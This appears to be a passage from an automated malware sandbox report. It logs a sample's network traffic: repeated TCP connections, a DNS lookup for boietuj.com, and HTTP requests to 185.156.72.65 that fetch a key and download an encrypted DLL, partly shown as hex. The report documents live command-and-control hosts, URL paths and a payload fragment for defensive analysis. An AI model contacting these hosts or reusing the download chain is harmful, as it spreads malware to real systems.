                                                                Nov 20, 2024 05:03:54.962649107 CET8050038185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:54.962762117 CET5003880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:55.082675934 CET5003880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:55.083157063 CET5003980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:55.087856054 CET8050038185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:55.087928057 CET5003880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:55.087996006 CET8050039185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:55.088252068 CET5003980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:55.088346958 CET5003980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:55.093122959 CET8050039185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:55.796256065 CET8050039185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:55.796531916 CET5003980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:55.910104036 CET5003980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:55.910401106 CET5004080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:55.915235043 CET8050039185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:55.915293932 CET8050040185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:55.915421963 CET5003980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:55.915556908 CET5004080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:55.915716887 CET5004080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:55.920531034 CET8050040185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:56.638695955 CET8050040185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:56.638761997 CET5004080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:56.753742933 CET5004080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:56.754606009 CET5004180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:56.759022951 CET8050040185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:56.759145021 CET5004080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:56.759502888 CET8050041185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:56.759725094 CET5004180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:56.760502100 CET5004180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:56.765383959 CET8050041185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:57.469749928 CET8050041185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:57.469980001 CET5004180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:58.006012917 CET5004180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:58.006429911 CET5004280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:58.011449099 CET8050041185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:58.011655092 CET5004180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:58.011692047 CET8050042185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:58.011853933 CET5004280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:58.039854050 CET5004280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:58.045188904 CET8050042185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:58.719826937 CET8050042185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:58.720031023 CET5004280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:58.845387936 CET5004280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:58.845798016 CET5004380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:58.850810051 CET8050042185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:58.850846052 CET8050043185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:58.850872040 CET5004280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:58.850923061 CET5004380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:58.851417065 CET5004380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:58.856925011 CET8050043185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:59.577845097 CET8050043185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:59.578052044 CET5004380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:59.695801973 CET5004380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:59.696094990 CET5004480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:59.700982094 CET8050044185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:59.701131105 CET5004480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:59.701314926 CET8050043185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:03:59.701514959 CET5004380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:59.701590061 CET5004480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:03:59.706468105 CET8050044185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:00.427445889 CET8050044185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:00.430705070 CET5004480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:00.575982094 CET5004480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:00.576343060 CET5004580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:00.581332922 CET8050045185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:00.581587076 CET5004580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:00.581823111 CET5004580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:00.581917048 CET8050044185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:00.582097054 CET5004480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:00.586868048 CET8050045185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:01.290733099 CET8050045185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:01.290858984 CET5004580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:01.681157112 CET5004580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:01.685508966 CET5004680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:01.686638117 CET8050045185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:01.686711073 CET5004580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:01.691203117 CET8050046185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:01.691267014 CET5004680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:01.695470095 CET5004680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:01.700500011 CET8050046185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:02.423727036 CET8050046185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:02.423851013 CET5004680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:02.542746067 CET5004680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:02.547903061 CET8050046185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:02.792447090 CET8050046185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:02.792645931 CET5004680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:02.917129993 CET5004680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:02.917695999 CET5004780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:02.922411919 CET8050046185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:02.922472000 CET5004680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:02.922713041 CET8050047185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:02.922884941 CET5004780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:02.922924995 CET5004780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:02.927894115 CET8050047185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:03.640023947 CET8050047185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:03.640275955 CET5004780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:03.754031897 CET5004780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:03.754744053 CET5004880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:03.760133982 CET8050047185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:03.760176897 CET8050048185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:03.760209084 CET5004780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:03.760410070 CET5004880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:03.760540009 CET5004880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:03.765492916 CET8050048185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:04.467097044 CET8050048185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:04.467375040 CET5004880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:04.583549023 CET5004880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:04.583813906 CET5004980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:04.589134932 CET8050049185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:04.589183092 CET8050048185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:04.589250088 CET5004980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:04.589354038 CET5004880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:04.589704037 CET5004980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:04.594722033 CET8050049185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:05.296166897 CET8050049185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:05.296380043 CET5004980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:05.505038023 CET5004980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:05.510622025 CET8050049185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:05.510711908 CET5004980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:05.521192074 CET5005080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:05.526124954 CET8050050185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:05.526344061 CET5005080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:05.562829018 CET5005080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:05.567769051 CET8050050185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:06.232191086 CET8050050185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:06.232400894 CET5005080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:06.365292072 CET5005080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:06.365842104 CET5005180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:06.373066902 CET8050050185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:06.373228073 CET8050051185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:06.373270988 CET5005080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:06.373295069 CET5005180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:06.375147104 CET5005180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:06.382412910 CET8050051185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:07.074831009 CET8050051185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:07.075223923 CET5005180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:07.197357893 CET5005180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:07.198024035 CET5005280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:07.202835083 CET8050051185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:07.202960968 CET8050052185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:07.203047991 CET5005180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:07.203062057 CET5005280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:07.203347921 CET5005280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:07.208156109 CET8050052185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:07.930809975 CET8050052185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:07.930876970 CET5005280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:08.050504923 CET5005280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:08.050860882 CET5005380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:08.056668043 CET8050052185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:08.056736946 CET5005280192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:08.056746960 CET8050053185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:08.056843042 CET5005380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:08.056974888 CET5005380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:08.061892033 CET8050053185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:08.770709991 CET8050053185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:08.770838976 CET5005380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:08.878520012 CET5005380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:08.988239050 CET8050053185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:09.241702080 CET8050053185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:09.241905928 CET5005380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:09.363441944 CET5005380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:09.363729000 CET5005480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:09.368642092 CET8050054185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:09.368699074 CET8050053185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:09.368705034 CET5005480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:09.368753910 CET5005380192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:09.369337082 CET5005480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:09.374262094 CET8050054185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:10.097054958 CET8050054185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:10.097218037 CET5005480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:10.206680059 CET5005480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:10.211673021 CET8050054185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:10.464906931 CET8050054185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:10.465007067 CET5005480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:10.582299948 CET5005480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:10.582828999 CET5005580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:10.587635994 CET8050054185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:10.587711096 CET5005480192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:10.588105917 CET8050055185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:10.588191986 CET5005580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:10.588433981 CET5005580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:10.593374014 CET8050055185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:11.292295933 CET8050055185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:11.292433977 CET5005580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:11.411612034 CET5005580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:11.411899090 CET5005680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:11.720412970 CET5005580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:12.329706907 CET5005580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:12.355875015 CET8050056185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:12.355937958 CET5005680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:12.356038094 CET8050055185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:12.356204033 CET5005680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:12.356237888 CET5005580192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:12.357464075 CET8050055185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:12.357472897 CET8050055185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:12.361067057 CET8050056185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:13.148518085 CET8050056185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:13.148622990 CET5005680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:13.269150972 CET5005680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:13.269435883 CET5005780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:13.274209976 CET8050056185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:13.274291992 CET8050057185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:13.274312019 CET5005680192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:13.274492979 CET5005780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:13.274492979 CET5005780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:13.279387951 CET8050057185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:13.978082895 CET8050057185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:13.978185892 CET5005780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:14.097311974 CET5005780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:14.097649097 CET5005880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:14.103270054 CET8050058185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:14.103285074 CET8050057185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:14.103346109 CET5005880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:14.103454113 CET5005780192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:14.103496075 CET5005880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:14.108349085 CET8050058185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:14.830722094 CET8050058185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:14.830873966 CET5005880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:14.945848942 CET5005880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:14.951442957 CET8050058185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:15.203723907 CET8050058185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:15.203927040 CET5005880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:15.315978050 CET5005880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:15.316390991 CET5005980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:15.321032047 CET8050058185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:15.321244955 CET8050059185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:15.321279049 CET5005880192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:15.321336031 CET5005980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:15.321496964 CET5005980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:15.326268911 CET8050059185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:16.026043892 CET8050059185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:16.029802084 CET5005980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.145210981 CET5005980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.145454884 CET5006080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.150403023 CET8050060185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:16.150413990 CET8050059185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:16.150506973 CET5006080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.150511980 CET5005980192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.150794029 CET5006080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.155555010 CET8050060185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:16.852190971 CET8050060185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:16.852260113 CET5006080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.972306967 CET5006080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.972630978 CET5006180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.977428913 CET8050061185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:16.977534056 CET8050060185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:16.977581024 CET5006080192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.977660894 CET5006180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.977709055 CET5006180192.168.2.4185.208.158.202
                                                                Nov 20, 2024 05:04:16.982541084 CET8050061185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:17.704370022 CET8050061185.208.158.202192.168.2.4
                                                                Nov 20, 2024 05:04:17.704691887 CET5006180192.168.2.4185.208.158.202

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 20, 2024 05:03:18.508125067 CET5229653192.168.2.445.155.250.90
                                                                Nov 20, 2024 05:03:18.542480946 CET535229645.155.250.90192.168.2.4

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Nov 20, 2024 05:03:18.508125067 CET192.168.2.445.155.250.900x9a77Standard query (0)boietuj.comA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Nov 20, 2024 05:03:18.542480946 CET45.155.250.90192.168.2.40x9a77No error (0)boietuj.com185.208.158.202A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • 185.156.72.65
                                                                • boietuj.com

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.449730185.156.72.65806556C:\Users\user\Desktop\file.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:02:15.232590914 CET419OUTGET /add?substr=mixeleven&s=three&sub=nosub HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                User-Agent: 1
                                                                Host: 185.156.72.65
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Nov 20, 2024 05:02:16.048826933 CET204INHTTP/1.1 200 OK
                                                                Date: Wed, 20 Nov 2024 04:02:15 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Length: 1
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 31
                                                                Data Ascii: 1
                                                                Nov 20, 2024 05:02:16.306072950 CET388OUTGET /dll/key HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                User-Agent: 1
                                                                Host: 185.156.72.65
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Nov 20, 2024 05:02:17.378030062 CET224INHTTP/1.1 200 OK
                                                                Date: Wed, 20 Nov 2024 04:02:16 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Length: 21
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                                Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                                Nov 20, 2024 05:02:17.378061056 CET224INHTTP/1.1 200 OK
                                                                Date: Wed, 20 Nov 2024 04:02:16 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Length: 21
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                                Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                                Nov 20, 2024 05:02:17.378088951 CET224INHTTP/1.1 200 OK
                                                                Date: Wed, 20 Nov 2024 04:02:16 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Length: 21
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                                Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                                Nov 20, 2024 05:02:17.387880087 CET393OUTGET /dll/download HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                User-Agent: 1
                                                                Host: 185.156.72.65
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Nov 20, 2024 05:02:17.857040882 CET1236INHTTP/1.1 200 OK
                                                                Date: Wed, 20 Nov 2024 04:02:17 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                                Content-Length: 97296
                                                                Keep-Alive: timeout=5, max=98
                                                                Connection: Keep-Alive
                                                                Content-Type: application/octet-stream
                                                                Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED]
                                                                Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk*~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<*Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEP*OuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q*)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~|jbK!N7R}T2bsq1L^!|qD'sLnD@bn%0=bQ1+lQXO|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
